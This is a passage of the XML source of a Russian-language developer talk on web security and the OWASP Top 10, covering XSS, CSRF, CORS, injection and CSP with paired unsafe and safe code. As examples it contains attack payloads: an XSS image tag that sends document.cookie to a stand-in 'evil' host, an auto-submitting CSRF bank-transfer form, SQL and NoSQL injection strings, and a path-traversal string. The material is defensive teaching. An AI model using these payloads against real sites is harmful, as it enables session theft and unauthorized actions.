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Доклад №5. Безопасность веб-приложений: OWASP Top 10 на практике</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что разбирается:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS (и почему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> опасен), CSRF, CORS «как он есть на самом деле», инъекции, CSP, утечки через зависимости в npm.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1. XSS: почему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это дыра</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Вставка строки как HTML заставляет браузер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">исполнить</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всё, что там есть:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// ОПАСНО</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">comment.innerHTML = userInput;   // &lt;img src=x onerror="fetch('//evil/?c='+document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// БЕЗОПАСНО: текстовый узел — браузер не парсит его как разметку</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">comment.textContent = userInput;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БЕЗОПАСНО: React вставляет значение как текст</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return &lt;p&gt;{userInput}&lt;/p&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Три вида XSS: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Вид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Где живёт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Пример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Хранимый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в базе, отдаётся всем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комментарий со скриптом в БД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Отражённый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в параметрах запроса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?q=&lt;script&gt;...</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> в поисковой выдаче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DOM-based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целиком в браузере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location.hash</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> →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innerHTML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Что может украсть XSS: cookie без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">httpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, отправку форм, токены из DOM, переписку, нажатия клавиш (через перехват обработчиков).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Правила защиты:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Не вставлять пользовательские данные как HTML.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">textContent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">{value}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если очень нужно — прогонять через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и держать белый список тегов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Экранировать на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">выходе</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не на входе (одно и то же значение нужно по-разному в HTML, в атрибуте, в JS, в URL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — только осознанно и только с санитайзером.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как вторая линия: даже если скрипт попал в разметку, он не загрузится.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Cookie с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">httpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XSS не сможет её прочитать.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Проверка:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> откройте DevTools, введите в любое поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror="alert(1)"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если появляется диалог — есть XSS. В нашем проекте React (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">{value}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и EJS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%= %&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) экранируют автоматически, поэтому вставка превращается в обычный текст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. CSRF: почему «действие с чужого сайта» работает</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Браузер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">автоматически прикладывает cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> домена к запросу, независимо от того, кто этот запрос инициировал. Значит, чужой сайт может отправить форму на наш домен — и жертва выполнит действие, будучи залогиненной.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;!-- на сайте злоумышленника --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;form action="https://bank.example/transfer" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;input name="to" value="attacker"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;input name="amount" value="100000"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;document.forms[0].submit()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Защита — комбинированная:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">`SameSite` cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (по умолчанию в современных браузерах) не отправляет cookie при кросс-сайтовых POST — самый простой барьер.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF-токен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (double submit): сервер кладёт случайный токен в сессию и в скрытое поле формы; при POST сравнивает через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">timingSafeEqual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Чужой сайт не может прочитать токен из нашей формы (его блокирует политика одного источника).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Проверка `Origin`/`Referer`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для «меняющих» запросов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Не менять состояние через GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — картинка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src="/delete?id=1"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не должна ничего удалять.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Типичные ошибки: токен не проверяется на GET-эндпоинтах, которые меняют данные; CSRF-проверка отключена для «внутренних» API; токен передаётся в cookie и сравнивается сам с собой без привязки к сессии.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. CORS «как он есть на самом деле»</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">CORS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">не защита от атак</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а механизм разрешения кросс-доменных чтений. Правило браузера: ответ с другого источника можно прочитать, только если сервер явно разрешил.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Origin: https://app.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access-Control-Allow-Origin: https://app.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access-Control-Allow-Credentials: true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access-Control-Allow-Methods: GET, POST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access-Control-Allow-Headers: Content-Type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Что важно знать: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CORS ограничивает только браузер.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и серверные скрипты читают ответ без всяких проверок.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Простой запрос</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (GET/POST с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: text/plain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и т.п.) уходит сразу, но ответ браузер не отдаст скрипту без разрешающих заголовков.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Preflight</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) выполняется для «непростых» запросов (свой заголовок, JSON-тело, PUT/DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Главный антипаттерн: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin: *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">вместе</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Credentials: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — браузер такое сочетание запретит, а вот «отражать» любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из запроса вручную (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">echo $Origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — распространённая ошибка: это разрешает читать приватные данные любому чужому сайту.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Приватный API нельзя «защитить CORS-ом» — защищать надо аутентификацией и правами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Инъекции: SQL, NoSQL, команды, шаблоны</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// ОПАСНО: конкатенация запроса</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">db.query(`SELECT * FROM users WHERE login='${login}'`);   // login = "admin' OR '1'='1"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БЕЗОПАСНО: параметризованный запрос</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">db.query('SELECT * FROM users WHERE login = ?', [login]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Правила:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• всегда параметризованные запросы/ORM; конкатенация строк — никогда;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• имена таблиц/колонок из пользовательского ввода не подставляются (наш SQLite-адаптер экранирует имя таблицы, но берёт его только из кода, а не из запроса);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• проверять не только SQL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с пользовательскими аргументами, MongoDB-операторы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">$where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{$ne: null}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в полях), инъекция в шаблоны (SSTI), в XML (XXE), в заголовки (CRLF/header injection), в путь файла (path traversal — «../../etc/passwd»).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Прочие пункты OWASP Top 10 (2021) кратко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Пункт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В чём суть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Что делать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A01 Broken Access Control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проверка прав только в интерфейсе, IDOR (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/api/order/123</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> чужого пользователя)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проверять права на сервере, привязывать объект к субъекту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A02 Cryptographic Failures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md5 для паролей, HTTP вместо HTTPS, свои «шифры»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bcrypt/argon2, TLS, стандартные библиотеки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A03 Injection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SQL/команды/шаблоны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параметризация, валидация, белые списки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A04 Insecure Design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нет модели угроз, «секретный» endpoint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проектировать с учётом угроз, лимиты, отказ по умолчанию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A05 Security Misconfiguration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дефолтные пароли, отладочные режимы, открытые каталоги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минимум прав,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.env</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, выключить debug в проде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A06 Vulnerable Components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устаревшие зависимости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npm audit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, обновление, lock-файл, минимум пакетов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A07 Authentication Failures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перебор, отсутствие лимитов, слабые пароли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лимит попыток, 2FA, политика паролей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A08 Integrity Failures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небезопасные десериализация/обновления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подписи, проверка целостности, CDN с SRI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A09 Logging Failures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инцидент не с чем связать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логи входов/изменений, мониторинг, алерты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A10 SSRF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сервер ходит по ссылке от пользователя во внутреннюю сеть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белый список домены/схемы, блокировка private IP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6. CSP: вторая линия обороны</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> задаёт, откуда можно грузить ресурсы и что исполнять:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Content-Security-Policy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  default-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  script-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  style-src 'self' 'unsafe-inline';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  img-src 'self' data: https:;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  connect-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  form-action 'self';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  frame-ancestors 'none';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Что это даёт: если XSS-вставка всё-таки проскочила, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script src="//evil/x.js"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не выполнится, а инлайн-скрипт (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) будет заблокирован при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">script-src 'self'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Как вводить безопасно: начать с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy-Report-Only</w:t>
      </w:r>
      <w:r>
